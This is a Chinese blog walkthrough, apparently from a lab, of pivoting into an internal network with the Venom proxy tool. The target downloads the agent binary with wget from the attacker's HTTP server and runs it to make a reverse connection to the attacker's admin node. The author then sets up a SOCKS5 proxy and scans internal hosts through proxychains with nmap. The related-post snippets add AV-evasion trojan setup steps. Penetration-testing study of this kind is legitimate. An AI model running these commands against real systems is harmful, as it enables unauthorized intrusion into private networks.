Venom 内网穿透

已于 2022-04-19 09:25:21 修改
阅读量4.2k 收藏 13
点赞数 3
文章标签: 安全
于 2022-04-17 16:43:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44617541/article/details/124228836
版权

Venom 内网穿透

项目地址:https://github.com/Dliv3/Venom/releases

文章目录

前言

内网穿透代理工具Venom使用
在客户端跟服务器端建立隧道

一、进入内网

利用Venom建立一条跟kali连接的隧道把网络打通,kali基于Venom代理去扫描内网,对内网进行渗透。

二、使用步骤

1.进入Venom路径目录

客户端目标是linux程序所以使用agent_linux_x64
需要把agent_linux_x64传输到目标系统上
服务端运行admin_linux_x64

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ ls
admin.exe        admin_linux_x86  agent_arm_eabi5  agent_linux_x64  agent_macos_x64        changelog
admin_linux_x64  admin_macos_x64  agent.exe        agent_linux_x86  agent_mipsel_version1  scripts

2.运行服务端

本地监听一个端口等待着目标服务系统建立一个反弹的连接

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999 
Venom Admin Node Start...

3.客户端计算机

首先需要获取到客户端agent_linux_x64程序
获取的方法可以在kali上启动一个http服务
然后在目标靶机上运行wget,把kali上的程序下载到客户端

使用python3 调用http模块,启动一个server,监听80 端口
kali上启动了一个http.sever 的web服务

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

回到目标系统通过wget访问kali服务器系统上的http服务
把agent_linux_x64下载到客户端

/app # wget http://192.168.0.7/agent_linux_x64
Connecting to 192.168.0.7 (192.168.0.7:80)
agent_linux_x64      100% |*******************************|  3791k  0:00:00 ETA

ls看到已经下载下来了

/app # ls
Dockerfile
agent_linux_x64
main.py
requirements.txt
templates

chmod赋予agent_linux_x64可执行的权限
然后执行远程Venom 的服务器端
rhost 指定IP(kali服务器端的IP)
rport指定远程服务器端口(kali服务器端的监听端口)
客户端

/app # chmod +x agent_linux_x64
/app # ./agent_linux_x64 -rhost  192.168.0.7 -rport 9999
与服务器端建立连接
2022/04/15 14:44:17 [+]Successfully connects to a new node

服务器端

可以通过show命令查看建立的连接
(admin node) >>> show
A
+ -- 1

goto 到节点
启动socks监听
这样就在kali上使用了一个socks 1080 的监听代理

(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080 
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>> (node 1) >>>

4.挂载proxychains

虽然建立了连接但是不能使用外部工具扫描,还需要挂载proxychains,这样才能对代理的内网进行信息收集
修改proxychains配置文件

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ sudo vim /etc/proxychains4.conf

改为socks5(1080为启动的代理侦听端口)

socks5  127.0.0.1 1080

三、对内网进行信息收集

这里使用nmap 对内网进行扫描

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ proxychains nmap -Pn -sT 172.17.0.1 

可以看到开放了 225000 端口
Nmap scan report for 172.17.0.1
Host is up (0.015s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

对内网 172.10.0.1开放的 22 5000 端口进行服务发现

┌──(kali㉿kali)-[~/桌面/Venom v1.1.0]
└─$ proxychains nmap -p 22,5000 -sV -Pn -sT 172.17.0.1

22、5000端口开放的服务

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现5000端口开放的是http服务,可以使用浏览器打开
但浏览器也必须要设置代理
使用socks代理
在这里插入图片描述
访问成功
在这里插入图片描述

依次对扫描出来的内网IP进行服务发现,这里就不一一重复了
IP太多或者麻烦的可以定义一个变量来对整个网段循环扫描
在这里插入图片描述
剩下的就是主机发现,服务发现,扫描端口,利用漏洞,等等等等一系列的操作了,就不在往下写了,以后我也会出一些对内网漏洞利用的一些文章。

Venom 内网代理穿透

beginner_Yin
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之内网渗透(二):内网穿透
m0_74131821的博客
04-24 2443
本文将从内网穿透的原理开始探讨,根据不同的内网出网入网情况,灵活设计对应的内网穿透方案
vulnhub-BoredHackerBlog:SocialNetwork通关教程
hot_milk1的博客
02-20 1583
2.挂代理启动扫描,发现172.17.0.1,172.17.0.3相同,172.17.0.2存在9200端口。1.用浏览器访问http://192.168.56.101:5000,但在页面上并没有发现有用的信息。2.对http://192.168.56.101:5000进行目录扫描。6.在根目录下发现passwords文件,内含用户名一些用户名和密码。方法二:查看/proc/1/cgroup是否存在docker目录。发现TCP5000端口,开放有Python2,Web服务。
内网穿透工具-venom
mingyqf的博客
12-12 2000
Venom - A Multi-hop Proxy for Penetration Testers 简体中文 | English https://github.com/Dliv3/Venom Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。 Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。 渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。 此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相
探索网络漏洞的利器:Venom 框架
最新发布
gitblog_00061的博客
05-14 347
探索网络漏洞的利器:Venom 框架 项目地址:https://gitcode.com/v3n0m-Scanner/V3n0M-Scanner 在网络安全领域,发现和利用漏洞是一项至关重要的任务。这就是为什么我们向您推荐Venom——一个强大的进攻性安全框架,专为漏洞扫描和渗透测试而设计。这个全面的工具集将帮助安全专家们以高效且可靠的方式检查系统安全性。 1. 项目介绍 Venom是一个基于Py...
内网渗透系列:内网隧道之Venom
闵行小鱼塘
04-09 1353
本文研究端口转发&SOCKS5&SSH的一个工具,Venom
Venom工具的使用(内网渗透 多级代理)
rang的博客
08-19 3164
在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接 agent监
内网穿透工具---Venom使用教程
热门推荐
u011215939的博客
12-05 1万+
介绍 从某个做内网工作的朋友口里面听到这个工具:Venom;这是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。这个工具在github上面链接;流弊呀~~~确实是很流弊的 这个工具直接下载编译好的比较方便啦;目录结构: admin agent...
venom-master_venom_apiwhatsapp_
09-29
venom source code for whatsapp api
Venom
03-12
毒液用户机器人 #include /** Your Telegram account may get banned. I am not responsible for any improper use of this bot This bot is intended for the purpose of having fun with memes, ...
Venom Guestbook-开源
05-15
Venom Guestbook 开源详解】 Venom Guestbook 是一款开源的在线留言簿软件,专为网站所有者设计,提供了一种与访问者互动、收集反馈的便捷方式。开源软件的特点在于其源代码对公众开放,允许用户自由查看、修改和...
Android代码-Venom
08-06
Venom Your preferred open source focused crawler for the Deep Web. Overview Our aim is to create a blazing fast, fully customizable and robust crawler that is simple and handy to use. Quick links ...
vsts-agent-linux-x64-2.131.0.tar
12-25
vsts-agent-linux-x64-2.131.0.tar,tfs的代理
php-venom-master
03-12
【标题】"php-venom-master" 指的可能是一个PHP项目,名为"php_venom"的主分支或版本。在编程领域,通常使用类似"master"的术语来标识项目的主线或主要版本。这可能是一个开源项目,或者一个用于特定功能或目的的PHP...
靶场vulnstack4内网渗透
weixin_71169068的博客
11-18 1016
靶场vulnstack4内网渗透
如何在kali虚拟机中下载内网穿透工具venom
qq_73393033的博客
10-13 475
这样venom的压缩文件就被下载到了/home/kali文件夹中了。
剑指Offer.36 二叉搜索树与双向链表
qq_43269370的博客
09-27 244
输入一棵二叉搜索树,将该二叉搜索树转换成一个排序的循环双向链表 要求不能创建任何新的节点,只能调整树中节点指针的指向 解题思路 中序遍历二叉树, 遍历每个节点的时候, 用变量保存好头节点, 当前节点的上一节点, 尾节点 将当前节点的left指向前一节点, 上一节点的right指向当前节点 最后头节点和尾节点需要互指(头.left = 尾, 尾.right = 头) 代码 /* // Definition for a Node. class Node { public int val; pub
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 6990
代理面试常问一.概述代理的本质是socks协议
破除安全软件的防御-------黑客免杀的生成
张同学
11-11 379
一、什么是黑客免杀 kali利用venom生成免杀木马 1.获取源码 git clone https://github.com/r00t-3xp10it/venom.git 2.设置权限 cd venom sudo chmod -R +x *.sh sudo chmod -R +x *.py 3.执行安装 cd aux sudo ./setup.sh 4.运行 sudo ./venom.sh 5选择对应的操作系统 6选择相应的攻击模块 这里可以看到,总共有20个攻击模块,不同额模块有不同的编码方式来绕过杀毒
Venom工具的使用
weixin_44508748的博客
05-23 4261
前提:已经拿到某服务器shell,可以上传文件且具有执行权限; 项目地址(编译后):https://github.com/Dliv3/Venom/releases 一、进入内网 1.上传admin_linux_x64到vps端,运行并监听本地11111端口: chmod 777 admin_linux_x64 ./ admin_linux_x64 -lport 11111 2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行 chmod 777 agent_linu
FileNotFoundError: [Errno 2] No such file or directory: '毒液:致命守护者 Venom-豆瓣短评.csv'
04-25
当使用`with open()`加载文件内容时,如果文件不存在,会出现`FileNotFoundError: [Errno 2] No such file or directory`的错误。解决这个问题的方法有多种。下面是两种常见的解决方法: 1. 使用`try-except`语句捕获异常[^1]: ```python try: with open('毒液:致命守护者 Venom-豆瓣短评.csv', 'r') as file: # 处理文件内容 except FileNotFoundError: print("文件不存在") ``` 2. 使用`os.path.exists()`函数检查文件是否存在: ```python import os file_path = '毒液:致命守护者 Venom-豆瓣短评.csv' if os.path.exists(file_path): with open(file_path, 'r') as file: # 处理文件内容 else: print("文件不存在") ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值